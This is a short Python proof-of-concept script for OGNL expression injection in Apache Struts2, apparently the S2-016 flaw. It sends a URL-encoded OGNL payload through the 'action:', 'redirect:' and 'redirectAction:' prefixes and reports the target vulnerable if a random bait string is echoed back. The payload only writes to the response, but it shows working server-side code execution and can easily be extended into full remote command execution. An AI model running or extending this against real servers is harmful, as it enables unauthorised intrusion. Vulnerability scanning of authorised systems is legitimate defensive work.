# coding: utf-8 import string import random import urllib def poc(url): bait = "".join(random.sample(list(string.letters), 32)) poc = urllib.quote("%{") poc += urllib.quote("#test_str=new java.lang.String(\'{0}\'),".format(bait)) poc += urllib.quote("#a_resp=#context.get(\'com.opensymphony.xwork2.dispatcher.HttpServletResponse\'),") poc += urllib.quote("#a_resp.getWriter().println(#test_str),") poc += urllib.quote("#a_resp.getWriter().flush(),") poc += urllib.quote("#a_resp.getWriter().close()") poc += urllib.quote("}") for prefix in ["action:", "redirect:", "redirectAction:"]: if bait in urllib.urlopen("{0}?{1}{2}".format(url, prefix, poc)).read(): return True return False if __name__ == "__main__": import sys print poc(sys.argv[1])